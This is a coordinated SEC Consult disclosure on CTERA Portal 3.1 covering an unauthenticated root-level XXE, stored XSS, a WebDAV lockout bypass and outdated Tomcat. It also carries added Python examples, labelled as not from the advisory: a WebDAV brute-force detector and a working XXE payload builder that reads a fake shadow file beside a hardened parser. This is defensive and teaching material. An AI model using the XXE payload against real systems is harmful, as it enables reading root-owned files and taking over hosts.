Date: Wed, 5 Jun 2013 11:16:30 +0200
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: bugtraq <bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Subject: SEC Consult SA-20130605-0 :: Multiple vulnerabilities in CTERA Portal

SEC Consult Vulnerability Lab Security Advisory < 20130605-0 >
=======================================================================
              title: Multiple vulnerabilities in CTERA Portal
            product: CTERA Portal
 vulnerable version: 3.1
      fixed version: 3.2
             impact: Critical
           homepage: http://www.ctera.com
              found: 2013-02-04
                 by: Stefan Streichsbier 
                     SEC Consult Vulnerability Lab 
=======================================================================

Vendor description:
-------------------
CTERA Portal is a scalable cloud service delivery platform that enables the 
creation, delivery and management of cloud storage applications, including 
file sharing and sync, backup, and mobile collaboration.

Full details: 
http://www.ctera.com/products/products/ctera-portal-cloud-storage-delivery


Business recommendation:
------------------------
By exploiting the XXE vulnerability, an unauthenticated attacker gains full 
read access to the filesystem of CTERA Portal as the root user and can thus 
obtain sensitive information such as the root password hash from /etc/shadow. 
During the test this hash was cracked in a short time; the password turned out 
to be quite simple and is presumably the same for all CTERA Portal 
installations. Furthermore, by default the root user can log in via SSH with 
this password, which potentially allows attackers to fully take over unsecured 
CTERA Portal installations.


The recommendation of SEC Consult is to upgrade to version 3.2 immediately 
and to secure the SSH service by allowing public key authentication only.


Vulnerability overview/description:
---------------------------------------------
1.) Outdated Tomcat Version

The installed version of Tomcat is outdated and several vulnerabilities are 
publicly known for it.

2.) Bypass of Temporary Account Locking

The main login functionality temporarily locks an account after 5 failed 
authentication attempts. This lockout is not enforced on the WebDAV interface, 
which relies on HTTP Basic Authentication, so an attacker can guess passwords 
against WebDAV without ever triggering the lock.
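Because the lockout lives only in the web login, the WebDAV path has to be watched separately. The following detection logic is an added example and not part of the SEC Consult advisory or of CTERA's product: it applies the same failure budget the web login enforces (5 attempts) to the WebDAV endpoint by counting HTTP 401 responses per client IP in a sliding window, and additionally flags a success that follows such a burst. The log lines are constructed, in Tomcat's AccessLogValve "common" format; the /webdav/ prefix and the use of 401 for failed Basic Auth are assumptions, not facts stated in the advisory.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in Tomcat AccessLogValve "common" format; not real CTERA Portal logs.
# Assumptions: WebDAV is served under /webdav/ and a failed Basic Auth attempt yields 401.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2013:11:02:01 +0200] "PROPFIND /webdav/ HTTP/1.1" 401 -
10.0.0.5 - - [05/Jun/2013:11:02:02 +0200] "PROPFIND /webdav/ HTTP/1.1" 401 -
10.0.0.5 - - [05/Jun/2013:11:02:03 +0200] "PROPFIND /webdav/ HTTP/1.1" 401 -
10.0.0.5 - - [05/Jun/2013:11:02:04 +0200] "PROPFIND /webdav/ HTTP/1.1" 401 -
10.0.0.5 - - [05/Jun/2013:11:02:05 +0200] "PROPFIND /webdav/ HTTP/1.1" 401 -
10.0.0.5 - - [05/Jun/2013:11:02:06 +0200] "PROPFIND /webdav/ HTTP/1.1" 401 -
10.0.0.5 - admin [05/Jun/2013:11:02:07 +0200] "PROPFIND /webdav/ HTTP/1.1" 207 512
10.0.0.9 - - [05/Jun/2013:11:05:00 +0200] "PROPFIND /webdav/ HTTP/1.1" 401 -
10.0.0.9 - bob [05/Jun/2013:11:05:01 +0200] "GET /webdav/report.pdf HTTP/1.1" 200 4096
10.0.0.7 - - [05/Jun/2013:11:30:00 +0200] "POST /login HTTP/1.1" 302 -
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "user": m["user"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_webdav_bruteforce(log_text, threshold=5, window=timedelta(seconds=60),
                             webdav_prefix="/webdav/"):
    """Flag client IPs that exceed, on the WebDAV endpoint, the failure budget the
    web login enforces (5 attempts), and a later success from such an IP."""
    recent_failures = defaultdict(deque)   # ip -> timestamps of 401s inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(webdav_prefix):
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 401:
            q = recent_failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:      # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("lockout-bypass", ip, len(q)))
        elif rec["status"] < 400 and ip in flagged:
            # A successful request right after a burst of failures: a guess may have landed.
            alerts.append(("success-after-bruteforce", ip, rec["user"]))
            flagged.discard(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect_webdav_bruteforce(SAMPLE_LOG):
        print(alert)
```

On the sample, 10.0.0.5 is reported once when its fifth 401 lands inside the window, then again when the subsequent 207 shows a valid credential was found; 10.0.0.9's single failure stays below the threshold. Keying on the client IP rather than the user name is deliberate: Tomcat logs "-" as the remote user for a rejected Basic Auth attempt, so the guessed user name is not available in the access log.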

3.) Permanent Cross Site Scripting

The WebDAV functionality allows JavaScript code to be embedded in file names, 
which are later rendered unescaped in the web interface. An attacker can, for 
example, upload a file with a specially crafted name to a public shared folder 
that is accessible to every user of a certain group. When another user opens 
this shared folder in the web interface, the script runs in that user's 
session and the account can be taken over.

4.) XML External Entity Injection

The XML parser in use resolves external entities, which allows attackers to 
read local files and to send requests to systems on the internal network 
(e.g. port scanning). The risk of this vulnerability is dramatically 
increased by the fact that it can be exploited by anonymous users without 
existing accounts and that the Tomcat server, and thus the XML parser, runs 
as root. Attackers are able to read the root password hash from /etc/shadow 
and crack it within minutes. If the default SSH service configuration has not 
been secured, attackers can subsequently log in to the CTERA Portal via SSH 
as root and take full control of the system.
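The mechanism above, shown end to end as an added example that is not taken from the advisory (which withholds its proof of concept) and not CTERA's or Tomcat's code: a request body declares an external entity whose SYSTEM identifier is a file URL, and a parser configured to resolve external entities substitutes the file's contents into an element that the application then processes or echoes back. Python's xml.sax on top of expat stands in for the Java parser in the product; the target file is a constructed stand-in for /etc/shadow written to a temporary directory, and the hash in it is fake. The same SYSTEM URL could point at http://<internal-host>:<port>/, which is how the parser is turned into a port scanner; that part is not demonstrated because it needs a network.

```python
import os
import tempfile
import xml.sax
from io import BytesIO
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data, i.e. whatever the parser substituted for entity references."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def xxe_payload(target_url):
    """Classic XXE request body: an external general entity whose SYSTEM identifier is a
    URL (file://, http://, ...), referenced inside an element the application reads."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE request [ <!ENTITY xxe SYSTEM "' + target_url + '"> ]>\n'
        '<request><user>&xxe;</user></request>'
    ).encode()


def parse_untrusted(xml_bytes, resolve_external_entities):
    """Parse with a SAX parser. resolve_external_entities=True reproduces the vulnerable
    configuration: the parser fetches SYSTEM entities itself (local files, http:// URLs)."""
    parser = xml.sax.make_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(BytesIO(xml_bytes))
    return handler.text()


def parse_hardened(xml_bytes):
    """Defensive variant: refuse any document that carries a DTD at all (the only place an
    entity can be declared; the keyword is case-sensitive in XML), then parse with external
    entity resolution off. For production code the defusedxml package does this properly."""
    if b"<!DOCTYPE" in xml_bytes:
        raise ValueError("DTD not allowed in untrusted XML")
    return parse_untrusted(xml_bytes, resolve_external_entities=False)


def demo():
    """Run the payload against the vulnerable, the default and the hardened configuration."""
    # Constructed stand-in for /etc/shadow; the hash is not real.
    fake_shadow_line = "root:$6$constructedsalt$constructedhashvalue:15000:0:99999:7:::"
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "shadow")
        with open(path, "w") as f:
            f.write(fake_shadow_line)
        payload = xxe_payload("file://" + path)
        leaked = parse_untrusted(payload, resolve_external_entities=True)   # file contents
        silent = parse_untrusted(payload, resolve_external_entities=False)  # entity left empty
        try:
            parse_hardened(payload)
            rejected = False
        except ValueError:
            rejected = True
    return leaked, silent, rejected


if __name__ == "__main__":
    leaked, silent, rejected = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("default parser returned:   ", repr(silent))
    print("hardened parser rejected:  ", rejected)
```

The parser runs with the privileges of the process that hosts it, which is the whole point of the advisory's remark about Tomcat running as root: with the vulnerable setting the call above returns the fake shadow line verbatim, with external entity resolution off the reference expands to nothing, and the hardened path refuses the document before any entity is declared. Note that merely disabling external entities still leaves DTD-based denial of service open, which is why rejecting the DOCTYPE outright is the safer default for untrusted input.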


Proof of concept:
-----------------
Due to the potential impact, no proof-of-concepts are disclosed.


Vulnerable / tested versions:
-----------------------------
3.1


Vendor contact log:
------------------------
2013-02-26: Affected client sent report with vulnerability descriptions to 
vendor.
2013 March-May: Vulnerabilities have been analysed and a timeline for 
releasing patches has been scheduled. First round of patches has been 
published.
2013-06-05: SEC Consult releases coordinated security advisory.


Solution:
---------
Upgrade to version 3.2 and configure SSH for public-key-only authentication 
(in sshd_config: PasswordAuthentication no, PubkeyAuthentication yes, and 
root login restricted to key-based authentication or disabled).


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Secure your WordPress with MVIS Security Center!
https://www.sec-consult.com/en/Portfolio/Services/MVIS-Security-Center.htm

EOF Stefan Streichsbier / @2013
